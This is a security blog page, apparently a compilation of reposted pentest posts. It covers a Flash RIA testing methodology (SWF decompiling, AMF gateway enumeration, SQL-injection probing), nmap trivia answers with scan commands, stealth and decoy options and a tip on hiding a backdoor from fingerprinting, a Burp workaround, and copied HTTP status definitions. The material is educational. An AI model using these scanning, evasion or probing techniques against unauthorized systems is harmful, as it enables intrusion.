搜索此博客

2010年7月27日星期二

A Lazy Pen Tester’s Guide to Testing Flash Applications

Yesterday, I received a post in the Pen-Test mailing list requesting for tips/resources on penetration testing of flash applications. While there are some tools and white papers available, I could not find many authoritative resources which wraps the entire spectrum of flash security testing of RIA applications. So here is an endeavor to detail out the steps of testing. I will keep this post only to outline the essential steps or points. Please feel free to recommend additional inclusion of tools and techniques. The idea is to come up with a comprehensive paper which can be used by pen-testers to test flash based Rich Internet Applications (RIA).

A short unnecessary introduction on Flash RIA
Adobe Flash (formerly Macromedia Flash) is a multimedia platform originally acquired by Macromedia and currently developed and distributed by Adobe Systems. Since its introduction in 1996, Flash has become a popular method for adding animation and interactivity to web pages. Flash is commonly used to create animation, advertisements, and various web page Flash components, to integrate video into web pages, and more recently, to develop rich Internet applications. Source: en.wikipedia.org/wiki/Adobe_Flash

Conventionally, RIA developed with Adobe Flash technology consists of a frontend application compiled as an SWF/AIR object to be executed by the Flash Plugin inside the User’s Browser or the AIR Platform installed on the User’s System. This interactive application provides a user Interface to the end-user and in turn communicates with a backend server for its business logic over protocols like HTTP/AMF, HTTP/SOAP, HTTP/REST etc.

The security angle..
Similar to any widely used web application and software, a RIA can also be a victim of most common and dangerous security Issues. For example, since most Flash based RIAs are backed by an application for its business logic which in turn uses a database, a Flash based RIA might also be vulnerable to common application vulnerabilities like SQL Injection if user input is not sanitized properly. Quite logical huh?. Attackers can also utilize Flash to execute mass exploitation, for example backdoors or malware entirely written in Flash/ActionScript or BOFs against player/plugin or browser.

It is quite general to deduce that security flaws may also be present in the core environment (which includes the OS and web browsers) that can be exploited regardless of the applications (including Flash Player) running in that environment. A recent paper from Adobe suggests that the approach of Adobe is to implement robust security within its own products while “doing no harm” to the rest of the environment (in other words, to introduce no exposures to the rest of the environment, nor allow any avenues for additional exploitation of any existing platform security weaknesses). This provides a consistently high level of security for what Flash applications can do (as managed within Flash Player), regardless of the platform. Because Adobe products are also designed to be backwards-compatible when possible, some environments may be more vulnerable to weaknesses in the browser or operating system, or have weaker cryptography capabilities. Ultimately, users are responsible for their choices of platforms and maintenance of appropriate operational environments.

Vulnerabilities in flash RIA can be broadly classified under two categories: client side vulnerabilities and server side vulnerabilities. Let’s review each one of these very quickly:

Client Side Vulnerabilities:
Amongst the various vulnerabilities that might affect a Flash Application on the client side, some of the most common ones are:

Flash parameter Injection: It might be possible for an attacker can inject global Flash parameters when the movie is embedded in a parent HTML page. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. There is nice detailed paper by the IBM Rational guys on this vulnerability. You can download it here.

Cross Domain Privilege Escalation: Cross Domain inter-mixing of content and data is done based on access policy defined in crossdomain.xml of the serving domain for the SWF object. If the access policy is too open, then under certain circumstances, it might be possible for an attacker to supersede the original SWF object with his own malicious version or access the DOM of the hosting domain.

Cross Site Scripting: Depending on access policy, a Flash SWF can access its host DOM for various functional use cases. A Flash SWF can in turn modify the DOM of its host and if it does so based on un-sanitized user input, it might be possible to perform a conventional XSS attack on the host DOM.

Cross Site Flashing: Cross Site Flash (XSF) occurs when an SWF objects loads another SWF Object. This attack could result in XSS or in the modification of the GUI in order to fool a user to insert credentials on a fake flash form. XSF could be used in the presence of Flash HTML Injection or external SWF files when loadMovie methods are used. OWASP has a testing guide for XSF. Although not comprehensive, still it is a very good point to start. Read it here.

Server Side Vulnerabilities
Flash Applications seldom makes remote calls to a backend server for various operations like looking up accounts, retrieving additional data and graphics, and performing complex business operations. However, the ability to call remote methods also increases the attack surface exposed by these applications. Flash Applications built with Adobe Flex SDK usually use AMF Objects exchanged over HTTP Protocol as a method of communication. AMF Remoting calls are essentially RPC like calls where the Flash Application is calling a given method defined on the server on a specific AMF Endpoint. An attacker can intercept and tamper the AMF data to compromise the server.

In most of the cases the application server responsible for providing Business Logic to a Flash RIA frontend is a standard web application and can be affected by the very same vulnerabilities as any other web application like as described by the WASC Threat Classification Project.

Testing Flash Applications: Objectives and Approach
A Flash Security Testing exercise for a Flash Based RIA is conducted with the following objectives:

Identify the application entry points and test for possible vulnerabilities in the SWF Object itself.
Identify the remote server with which the application might communicate for its business logic requirements.
Identify the protocol with which the SWF Object is communicating with its back-end server. In most of the cases, the protocol will either be SOAP/REST or AMF.
Identify and enumerate all the functionalities exposed by the back-end application.
Penetration Testing of the individual functionalities exposed by the back-end application for standard application security vulnerabilities.
Client Side Testing
Client side primarily relates to static analysis of the flash application. The idea of static analysis of a Flash SWF Object is to decompile the SWF file and attempt to do a white box testing approach by looking into the source code of the Flash SWF File. Basic approach to test client side vulnerabilities is :

Decompile SWF files into source code (ActionScript) and statically analyzes it to identify security issues such as information disclosure (hard coded).
Audit third party applications without requiring access to the source code.
Common vulnerabilities includes hard coded login credentials, internal IP disclosure, etc.
Apart from analyzing the SWF file, it is also important to analyze the code responsible for generating the HTML file that embeds the SWF object. Under certain circumstances in might be possible to manipulate the FlashVars variable through which SWF inputs can be influenced.
There are however automated tools like HP SWFScan available to do this job upto a certain degree.

Server Side Testing
The best straightforward way to do a server side testing for flash based RIA applications are as follows:

1. Extract Gateway

Load the flash e.g http://foo.com/bar.swf in a browser with service capture/burp proxy/charlesproxy running .
Decompile the SWF using swfdump and grep the gateway patterns. Also get a list of all the urls in SWFdump.
2. Enumerate service/methods

Try amfphp.DiscoveryService on all gateways using Pinta.
Use Pinta for AMF calling even if the services and methods are manually entered and hence can be helpful in testing remote methods.
If it fails try extracting them using regex from SWFDump using the following regular expression.
Services:

–"\"([a-zA-Z0-9_]*)\"“ with filter as “service” (conventional)–"destination id=\"([\\w\\d]*)\"“3. Make AMF calls

Use Pinta to call remote methods using different test parameters.
Single quote (SQL injection), neighbor parameters (Direct Object Reference).
Testing the backend application once the exposed functionalities are enumerated should be more or less conventional to standard web application security testing methodology just that a different protocol (AMF serialized calls in this case) is used for interacting with the server and invoking the functionalities.

Checklist of Vulnerabilities to be tested
Cross Site Scripting
Malicious Data Injection
Insufficient Authorization Restrictions
Secure Transmission
SWF Information Leak
Minimum Stage Size for Anti-ClickJacking
SWF Control Permission
Untrusted SWF in Same Domain
Clickjacking
Privilege Seperation
Cross Domain Policy Audit
Uninitialized Variable Scanning
Remote Method Enumeration
Business Logic Testing
This is a brief guide to testing flash applications. Comments are welcome to make it better and more comprehensive. At the end, we intend to publish a freely available whitepaper to pen testers for testing flash based RIA. Additional sections included in the paper will also carry due credits as received in the comments section below.


http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt

http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt

methods-of-quick-exploitation-of-blind

SQL Injection vulnerabilities are often detected by analyzing error messages received from the database, but sometimes we cannot exploit the discovered vulnerability using classic methods (e.g., union). Until recently, we had to use boring slow techniques of symbol exhaustion in such cases. But is there any need to apply an ineffective approach, while we have the DBMS error message?! It can be adapted for line-by-line reading of data from a database or a file system, and this technique will be as easy as the classic SQL Injection exploitation. It is foolish not to take advantage of such opportunity! In this paper, we will consider the methods that allow one to use the database error messages as containers for useful data

PDF Silent HTTP Form Repurposing Attacks

This paper sheds light on the modified approach to trigger web attacks through JavaScript protocol handler in the context of browser when a PDF is opened in it. As we have seen, the kind of security mechanism implemented by Adobe in order to remove the insecurities that originate directly from the standalone PDF document in order to circumvent cross domain access. The attack is targeted on the web applications that allow PDF documents to be uploaded on the web server. Due to ingrained security mechanism in PDF Reader, it is hard to launch certain attacks. But with this technique an attacker can steal generic information from website by executing the code directly in the context of the domain where it is uploaded. The attack surface can be diversified by randomizing the attack vector. On further analysis it has been observed that it is possible to trigger phishing attacks too. Successful attacks have been conducted on number of web applications mainly to extract information based on DOM objects. The paper exposes a differential behavior of Acro JS and Brower JavaScript.



PDF

NMAP Trivia ANSWERS: Mastering Network Mapping and Scanning

Three weeks ago I published the NMAP Trivia challenge. Thanks to all ISC readers that submitted their responses! A special mention goes to the winning entry from Jason DePriest, an extensive and elaborated submission, available here. Congratulations! The prize (technical book) is on his way! ;)

Jon Kibler provided an in-progress nmap idea for a new features, a scan proxy engine equivalent to the FTP bounce scan to scan through HTTP or SOCKS.

Now... it is time for the answers:

1. What are the default target ports used by the current nmap version (4.76)? How can you change the target ports list? What (nmap) options can be used to speed up scans by reducing the number of target ports and still check (potentially) the most relevant ones? How can you force nmap to check all target ports?

Fyodor performed a thorough port scan research this last summer to identify the most common ports available on the Internet [1]. The current nmap version scans by default the 1000 most popular ports. The popularity of each port is coded inside the nmap-services configuration file (by default under /usr/local/share/nmap).

...
unknown 4/tcp 0.000477
rje 5/udp 0.000593 # Remote Job Entry
unknown 6/tcp 0.000502
echo 7/tcp 0.004855
echo 7/udp 0.024679
unknown 8/tcp 0.000013
...

Nmap provides an option for quick scans, "-F". It scans the 100 most popular ports, reducing the default load in one order of magnitude. Additionally, you can decide how many popular ports you want to scan through the "--top-ports N" option, where "N" is the top number of ports.

# ./nmap -F scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:44 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 95 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp closed smtp
53/tcp open domain
80/tcp open http
113/tcp closed auth

Nmap done: 1 IP address (1 host up) scanned in 4.04 seconds

# ./nmap --top-ports 5 scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:44 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
23/tcp filtered telnet
80/tcp open http
443/tcp filtered https

Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds

Finally, nmap allows you to define the specific set of ports to scan through the "-p" option, as in "-pT:22,80,443,U:53,69,514". All ports, including port 0, can be scanned by providing the "-p0-" option, meaning from 0 till the end of the range, that is, port 65535. You need to specify if they are TCP or UDP ports, or both ("-sSU").

# nmap -p0- scanme.nmap.org

[1] http://insecure.org/presentations/BHDC08/


2. How can you force nmap to scan a specific list of 200 target ports, only relevant to you?

If you don't want to scan the most popular ports, you can tell nmap what particular list of ports to scan by specifying them with the "-p" option, one by one or in ranges, like in "-p 20-23,25,80,443". Because this can be too tedious for long lists of ports, the recommended way is to copy and edit the "nmap-services" file and create a custom version containing your list of interesting ports. The new custom file can be referenced using the "--servicedb" (for individual files) or "--datadir" (for the configuration files directory) options, as in:

# nmap --datadir ./myconfig scanme.nmap.org

If your custom file contains more than 200 target services, then you can use the "--top-ports 200" option again. The specific file and directory search order followed by nmap is detailed on page 370 of the nmap book: http://nmap.org/book/data-files-replacing-data-files.html.


3. What is the default port used by nmap for UDP ping discovery (-PU)? Why? If you don't know it from the top of your head ;), how can you easily identify this port without using other tools (such as a sniffer) or inspecting nmap's source code?

By default, nmap sends an empty UDP packet to port UDP/31338 for the UDP ping discovery method ("-PU"). The reason is that there is a high chance this random high port is closed. This is the preferred state expected by nmap trying to elicit an ICMP port unreachable packet in return and, as a result, identify the existence of a new host. The port number is defined in nmap.h, specifically in the DEFAULT_UDP_PROBE_PORT_SPEC constant. Did you notice it is 31337 plus 1, the elite port (31337 in haxor speech) plus one.

Currently, nmap provides the "--packet-trace" option to gather detailed information about the network traffic and individual packets sent and received during its operations. Effectively, this option acts as a built in sniffer, very useful to get details about what nmap is doing on the backstage.

# nmap -PU --packet-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 10:58 GMT
SENT (0.6580s) UDP 192.168.166.166:59676 > 64.13.134.52:31338 ttl=58 id=45958 iplen=28
SENT (1.6560s) UDP 192.168.166.166:59677 > 64.13.134.52:31338 ttl=59 id=46599 iplen=28
Note: Host seems down. If it is really up, but blocking our ping probes, try -PN
Nmap done: 1 IP address (0 hosts up) scanned in 2.68 seconds


4. When nmap is run, sometimes it is difficult to know what is going on the backstage. What two (nmap) options allow you to gather detailed but not overwhelming information about nmap's port scanning operations? What other extra (nmap) options are available for ultra detailed information?

The first of the options has been mentioned and used on the previous question, "--packet-trace". It allows to get a tcpdump-like output about packets sent and received. Additionally, nmap provides the "--reason" option to display the reason why a port has been clasiffied on an specific state: open, closed, filtered, etc.

# nmap -F -sSU --reason scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:00 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 99 open|filtered ports, 96 filtered ports
Reason: 194 no-responses and 1 admin-prohibited
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
25/tcp closed smtp reset
53/tcp open domain syn-ack
80/tcp open http syn-ack
113/tcp closed auth reset

Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

# nmap -F -sU --reason scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:02 GMT
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 99 open|filtered ports
Reason: 99 no-responses
PORT STATE SERVICE REASON
520/udp filtered route admin-prohibited from 192.168.15.1

Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds

For those interested on gathering as much information as possible about nmap's operations, the "-v" verbosity option, or the "-dN" debugging option are available. These options specify nmap to be verbose (multiple verbosity levels are allowed), or the nmap debug level for troubleshooting purposes, where N can have a value between 1 and 9. Be careful when you use it! Try it and be ready for a Matrix-like output 8-)

# nmap -p80 -sS -v scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:07 GMT
Initiating Ping Scan at 11:07
Scanning 64.13.134.52 [2 ports]
Completed Ping Scan at 11:07, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:07
Completed Parallel DNS resolution of 1 host. at 11:07, 0.24s elapsed
Initiating SYN Stealth Scan at 11:07
Scanning scanme.nmap.org (64.13.134.52) [1 port]
Discovered open port 80/tcp on 64.13.134.52
Completed SYN Stealth Scan at 11:07, 0.26s elapsed (1 total ports)
Host scanme.nmap.org (64.13.134.52) appears to be up ... good.
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
80/tcp open http

Read data files from: .
Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds
Raw packets sent: 3 (112B) | Rcvd: 2 (72B)


# nmap -p80 -sS -d1 scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:08 GMT
--------------- Timing report ---------------
...
---------------------------------------------
Initiating Ping Scan at 11:08
Scanning 64.13.134.52 [2 ports]
...
Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds
Raw packets sent: 3 (112B) | Rcvd: 2 (72B)

Try it by your own! ;)


5. What are the preferred (nmap) options to run a stealthy TCP port scan? Particularly, try to avoid detection from someone running a sniffer near the person running nmap and focus on the extra actions performed by the tool (assuming the packets required to complete the port scan are not detected)?

Most current network IDS can detect the default packets generated by nmap when port scanning a target. We are assuming here these cannot be detected, so a stealthier scan can be launched by using the "-n" option (not used in any of the Nmap Trivia examples), that is, disable all reverse DNS resolution at the nmap level. Most Unix-based security tools provide this same option for the same purpose.

# nmap -F -n scanme.nmap.org

However, this way you lose the sometimes valuable DNS information. You can use the "--dns-servers" option to indicate the DNS recursive servers to use as DNS proxies when analyzing the target IP address.
More stealthier details on answer number 12.

6. Why port number 49152 is relevant to nmap?

Port 49152 is the first of the ephemeral ports for dynamic usage based on IANA. However, the port assignment depends on the implementation of your tools or operating system. See http://www.iana.org/assignments/port-numbers:
- The Well Known Ports are those from 0 through 1023
- The Registered Ports are those from 1024 through 49151
- The Dynamic and/or Private Ports are those from 49152 through 65535

7. What is the only nmap TCP scan type that classifies the target ports as "unfiltered"? Why? What additional nmap scan type can be used to discern if those ports (previously identified as "unfiltered") are in an open or closed state?

The only nmap scan type that can show a port in the "unfiltered" state is the TCP ACK scan, "-sA" option. The reason is because this scan cannot differentiate between an open and closed port, as a target hosts (if unfiltered) will always reply with a RST packet. This is the standard behaviour for a closed port, and is also standar for an open port for which there is not a previously established connection to map the ACK packet to. Therefore, nmap's ACK scan cannot be considered a port scan, as it cannot differentiate between port states, but a host discovery scan.

The TCP Window scan, "-sW" option, is similar to the TCP ACK scan, but it can differentiate between open and closed ports is some scenarios.

8. When (and it what nmap version) the default state for a non-responsive UDP port was changed on nmap (from "open" to "open|filtered")? Why?

The default state for a non-responsive UDP port was changed (from "open" to "open|filtered") on nmap version v3.70 in 2004. The reason was accurancy, as extensive use of filtering devices by that time made filtered UDP ports always appear as open in previous nmap versions.

9. What is the default scan type used by nmap when none is specified, as in "nmap -T4 scanme.nmap.org"? Is this always the default scan method? If not, what other scan method does nmap default to, under what conditions, and why?

The current nmap version performs a TCP SYN scan ("-sS" option) by default when no scan type is specified. However, this is only the default behavior when nmap is launched as a privileged user (eg. root in Linux). The TCP connect scan, "-sT" option (connect() syscall), is used by default with non-privileged users as these cannot send raw packets (used by the SYN scan) or if there are IPv6 targets.

# ./nmap -PN -p80,81 --packet-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:22 GMT
...
SENT (0.3730s) TCP 192.168.166.166:56464 > 64.13.134.52:80 S ttl=50 \
id=8102 iplen=44 seq=1698869517 win=3072
SENT (0.3740s) TCP 192.168.166.166:56464 > 64.13.134.52:81 S ttl=43 \
id=48226 iplen=44 seq=1698869517 win=4096
RCVD (0.6120s) TCP 64.13.134.52:80 > 192.168.166.166:56464 SA ttl=48 \
id=0 iplen=44 seq=2849983456 win=5840 ack=1698869518
RCVD (1.9570s) TCP 64.13.134.52:80 > 192.168.166.166:40972 SA ttl=48 \
id=0 iplen=44 seq=2805666242 win=5840 ack=2103880733
SENT (2.5730s) TCP 192.168.166.166:56465 > 64.13.134.52:81 S ttl=55 \
id=14744 iplen=44 seq=1698935052 win=4096
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
80/tcp open http
81/tcp filtered hosts2-ns

Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds

$ ./nmap -PN -p80,81 --packet-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 11:25 GMT
...
CONN (0.1290s) TCP localhost > 64.13.134.52:80 => Operation now in progress
CONN (0.1290s) TCP localhost > 64.13.134.52:81 => Operation now in progress
CONN (2.3510s) TCP localhost > 64.13.134.52:81 => Operation now in progress
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
80/tcp open http
81/tcp filtered hosts2-ns

Nmap done: 1 IP address (1 host up) scanned in 3.57 seconds


10. What nmap features (can make or) make use of nmap's raw packet capabilities? What nmap features rely on the OS TCP/IP stack instead?

Nmap makes use of the raw packet capabilities by default, "--send-eth" option, as demonstrated in the previous question for some features, such as TCP and UDP port scans launched by privileged users (except for the connect scan and the FTP bounce scan), or fragmentation probes. Other features like the Nmap Scripting Engine and version detection relay on the OS TCP/IP stack.

11. Nmap's performance has been sometimes criticized versus other network scanners. What (nmap) options can you use to convert nmap into a faster, stateless scanner for high performance but less accurate results?

If the congestion controls and packet loss detection algorithms are omitted, a scanner will run faster. Nmap can achieve a similar behaviour as stateless scanners, no code to track and retransmit probes, using the following options:

# ./nmap --min-rate 1000 --max-retries 0 ...

These indicate nmap to send at least 1000 packets per second (if your system or wire can) and disable retransmission of timed-out probes. However, take into account the impact this might have in the accurancy of the results.

# ./nmap -PN -n --min-rate 1000 --max-retries 0 -F scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 12:08 GMT
Warning: Giving up on port early because retransmission cap hit.
Interesting ports on 64.13.134.52:
Not shown: 95 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp closed smtp
53/tcp open domain
80/tcp open http
113/tcp closed auth

Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

12. What relevant nmap feature does not allow an attacker to use the decoy functionality (-D) and might reveal his real IP address?

Apart from the previously mentioned "-n" option to run stealthier scans and avoid IDS detection, there are other related options, such as "--data-length", to change the default empty packet used for some probes, "--ttl" to modify the TTL on the sent packets, timing options ("-T"), "--randomize-hosts" to change the order the target hosts are scanned, or "-D" to launch a decoy scan (simulate the scan is coming from multiple hosts).

Decoys are used in the ping discovery, port scanning, and remote OS detection phases. However, this feature does not apply when DNS queries or service version detection ("-sV" or "-A") are used, being the source IP address disclosed.

13. What are the (nmap) options you can use to identify all the steps followed by nmap to fingerprint and identify the Web server version running on scanme.nmap.org?

# ./nmap -sSV -p80 --version-trace scanme.nmap.org

Starting Nmap 4.76 ( http://nmap.org ) at 2009-01-21 12:17 GMT
...
SCRIPT ENGINE: Initiating script scanning.
SCRIPT ENGINE: Script scanning scanme.nmap.org (64.13.134.52).
SCRIPT ENGINE: Initialized 4 rules
SCRIPT ENGINE: Matching rules.
SCRIPT ENGINE: Running scripts.
SCRIPT ENGINE: Script scanning completed.
Scanned at 2009-01-21 12:17:57 GMT for 8s
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.2 ((Fedora))
Final times for host: srtt: 238764 rttvar: 179294 to: 955940

Read from .: nmap-rpc nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds

The "-sSV" option allows you to focus on a TCP scan type (SYN scan in this case, "-sS"), and fingerprint the service ("-sV"). In order to just target the web server (supposing HTTP (TCP/80) is the target port, and not HTTPS (TCP/443)), the "-p80" option must be used.

The "--version-trace" option is similar to the "--packet-trace" option, but instead of dumping the network traffic, it dumps all the actions or steps performed by nmap during the execution of the service fingerprinting modules. Additionally, other debug options ("-dN") can be added to gather further details.

14. As an attacker, what port number would you select to hide a listening service backdoor trying to avoid an accurate detection by nmap's default aggressive fingerprinting tests? Would it be TCP or UDP? Why? What additional (nmap) options do you need to specify as a defender to fingerprint the hidden service backdoor?

If a port in the range of TCP/9100-9107 is selected for a backdoor, due to the fact these are common ports for printer services, nmap won`t fingerprint the service. These ports are excluded by default on the service fingerprinting tests ("-sV") or aggressive scan options ("-A") trying to save the planet, trees and forests specifically, by not making printers dump dozens of pages full of nmap probes and garbage as a result of the stimulous received from the scan.

If you want to enable service fingerprinting on all ports, there are two options. The "--allports" option can be specified, as in "nmap -A --allports", or the nmap-service-probes file can be modified to enable these ports by removing the "Exclude" directive.


15. What is the language used to write NSE scripts, and what two other famous open-source security tools/projects currently use the same language?

Nmap uses the LUA (www.lua.org) programming language. LUA (pronounced LOO-ah) means "Moon" in Portuguese, or "Luna" in Spanish ;) Other famous open-source security tools, like Wireshark and Snort use LUA to extend their capabilities.


16. What Linux/Windows command can you use to identify the list of NSE scripts that belong to the "discovery" category and will execute when this set of scripts is selected with the "--script discovery" nmap option?

By default, NSE scripts are available under the "scripts" directory (however, nmap searched in other locations too: --datadir, $NAMPDIR, etc), with the ".nse" file extension. All NSE scripts belong to one or more categories, define inside the script, and indexed by the scripts/script.db database (if updated through the "--script-updatedb" option).

Therefore a couple of options to search for discovery scripts in Linux are:

# grep discovery scripts/*.nse
scripts/ASN.nse:categories = {"discovery", "external"}
scripts/HTTP_open_proxy.nse:categories = {"default", "discovery", "external", "intrusive"}
scripts/HTTPtrace.nse:categories = {"discovery"}
...

# grep discovery scripts/script.db
Entry{ category = "discovery", filename = "HTTPtrace.nse" }
Entry{ category = "discovery", filename = "rpcinfo.nse" }
Entry{ category = "discovery", filename = "SMTPcommands.nse" }
...

You can perform a similar search in Windows using the built-in search capabilities (searching by "A word or phrase in the file" to look inside the directory) or the find or findstr commands (to search within a file or set of files).

17. How can you know the specific arguments accepted by a specific NSE script, such as those accepted by the whois.nse script?

In order to identify the arguments that can be passed through the "--script-args" option to a NSE script, eg. whois.nse, check the documentation or code within the script file. If it is properly documented, search by "-- @args" to go to the arguments documentation section.

Finally, a couple of extra questions for the real nmap-lovers:

How can you get in real-time the open ports discoverd by nmap before the final report is displayed?
What happens when you run nmap in verbose mode on September 1?
That's all folks! Happy nmap discovery and scanning!

Certificate-based Client Authentication in WebApp PenTests

http://www.radajo.com/2009/10/sqlninja-metasploit-demo.html
One of the key attack tools to perform effective Web Application Penetration Tests (WebApp PenTest) are interception proxies, allowing the analyst to inspect and modify all the requests and responses exchanged between the web browser and the target web application. Some of the most popular ones are developed in Java, such as Paros, Webscarab or Burp, being the Java platform a prerequisite to run.

Sun/Oracle has recently released new updates for Java: Java 6 Update 19 on March 2010, fixing 27 security issues, and Java 6 Update 20 on April 2010, including a couple of fixes. If you have updated the Java version of your pentesting system (You did, didn't you?), you must be aware that your interception proxies won't be able to audit web applications that make use of client X.509 certificates for authentication. This specifically affects pentests on e-government and e-banking web applications making use of client certificates, such as those stored on smart cards (like some European national identity cards); in particular for Spain, dozens of websites integrate authentication through the electronic national id card, "DNI electronico" (DNIe).

The reason is that Java 6 Update 19 includes a fix for the famous SSL/TLS renegotiation vulnerability from November 2009 (CVE-2009-3555). The SSL/TLS renegotiation feature is specifically used by certificate-based client authentication, and the fix disables SSL/TLS renegotiation in the Java Secure Sockets Extension (JSSE) by default. As a result, when you try to access a web resource that requires certificate-based client authentication through the interception proxy, it generates the following Java SSL/TLS error message (javax.net.ssl.SSLException): "HelloRequest followed by an unexpected handshake message".

Webscarab error message:



Burp error message:






However, it is still possible to re-enable the SSL/TLS renegotiation in Java by setting the new system property sun.security.ssl.allowUnsafeRenegotiation to true before the JSSE library is initialized. The following Windows command line launches Burp with SSL/TLS renegotiation enabled:

C:\>java -jar -Xmx512m -Dsun.security.ssl.allowUnsafeRenegotiation=true "C:\Program Files\burpsuite_pro_v1.3\burpsuite_pro_v1.3.jar"

Keep your WebApp PenTests rolling!

Shameless plug: Interested on learning the art of WebApp PenTesting? I will be teaching SANS SEC542, "Web Application Penetration Testing and Ethical Hacking", in London (May 10-15, 2010) in English and in Madrid (September 20-25, 2010) in Spanish.

2010年7月26日星期一

Additional notes in PHP source code auditing

http://www.abysssec.com/blog/category/fuzzing/


20 ways to php Source code fuzzing (Auditing)

2010年7月12日星期一

HTTP Status Codes

Informational 1xx

100 Continue
The client SHOULD continue with its request. This interim response is used to inform the client that the initial part of the request has been received and has not yet been rejected by the server. The client SHOULD continue by sending the remainder of the request or, if the request has already been completed, ignore this response. The server MUST send a final response after the request has been completed. See section 8.2.3 for detailed discussion of the use and handling of this status code.


101 Switching Protocols
The server understands and is willing to comply with the client's request, via the Upgrade message header field (section 14.42), for a change in the application protocol being used on this connection. The server will switch protocols to those defined by the response's Upgrade header field immediately after the empty line which terminates the 101 response.

The protocol SHOULD be switched only when it is advantageous to do so. For example, switching to a newer version of HTTP is advantageous over older versions, and switching to a real-time, synchronous protocol might be advantageous when delivering resources that use such features.


Successful 2xx

200 OK
The request has succeeded. The information returned with the response is dependent on the method used in the request, for example:

GET an entity corresponding to the requested resource is sent in the response;

HEAD the entity-header fields corresponding to the requested resource are sent in the response without any message-body;

POST an entity describing or containing the result of the action;

TRACE an entity containing the request message as received by the end server.


201 Created
The request has been fulfilled and resulted in a new resource being created. The newly created resource can be referenced by the URI(s) returned in the entity of the response, with the most specific URI for the resource given by a Location header field. The response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. The origin server MUST create the resource before returning the 201 status code. If the action cannot be carried out immediately, the server SHOULD respond with 202 (Accepted) response instead.

A 201 response MAY contain an ETag response header field indicating the current value of the entity tag for the requested variant just created, see section 14.19 .


202 Accepted
The request has been accepted for processing, but the processing has not been completed. The request might or might not eventually be acted upon, as it might be disallowed when processing actually takes place. There is no facility for re-sending a status code from an asynchronous operation such as this.

The 202 response is intentionally non-committal. Its purpose is to allow a server to accept a request for some other process (perhaps a batch-oriented process that is only run once per day) without requiring that the user agent's connection to the server persist until the process is completed. The entity returned with this response SHOULD include an indication of the request's current status and either a pointer to a status monitor or some estimate of when the user can expect the request to be fulfilled.


203 Non-Authoritative Information
The returned metainformation in the entity-header is not the definitive set as available from the origin server, but is gathered from a local or a third-party copy. The set presented MAY be a subset or superset of the original version. For example, including local annotation information about the resource might result in a superset of the metainformation known by the origin server. Use of this response code is not required and is only appropriate when the response would otherwise be 200 (OK).


204 No Content
The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response MAY include new or updated metainformation in the form of entity-headers, which if present SHOULD be associated with the requested variant.

If the client is a user agent, it SHOULD NOT change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place without causing a change to the user agent's active document view, although any new or updated metainformation SHOULD be applied to the document currently in the user agent's active view.

The 204 response MUST NOT include a message-body, and thus is always terminated by the first empty line after the header fields.


205 Reset Content
The server has fulfilled the request and the user agent SHOULD reset the document view which caused the request to be sent. This response is primarily intended to allow input for actions to take place via user input, followed by a clearing of the form in which the input is given so that the user can easily initiate another input action. The response MUST NOT include an entity.


206 Partial Content
The server has fulfilled the partial GET request for the resource. The request MUST have included a Range header field (section 14.35) indicating the desired range, and MAY have included an If-Range header field (section 14.27 ) to make the request conditional.

The response MUST include the following header fields:

- Either a Content-Range header field (section 14.16) indicating the range included with this response, or a multipart/byteranges Content-Type including Content-Range fields for each part. If a Content-Length header field is present in the response, its value MUST match the actual number of OCTETs transmitted in the message-body. - Date - ETag and/or Content-Location, if the header would have been sent in a 200 response to the same request - Expires, Cache-Control, and/or Vary, if the field-value might differ from that sent in any previous response for the same variant
If the 206 response is the result of an If-Range request that used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. If the response is the result of an If-Range request that used a weak validator, the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers. Otherwise, the response MUST include all of the entity-headers that would have been returned with a 200 (OK) response to the same request.

A cache MUST NOT combine a 206 response with other previously cached content if the ETag or Last-Modified headers do not match exactly, see 13.5.4 .

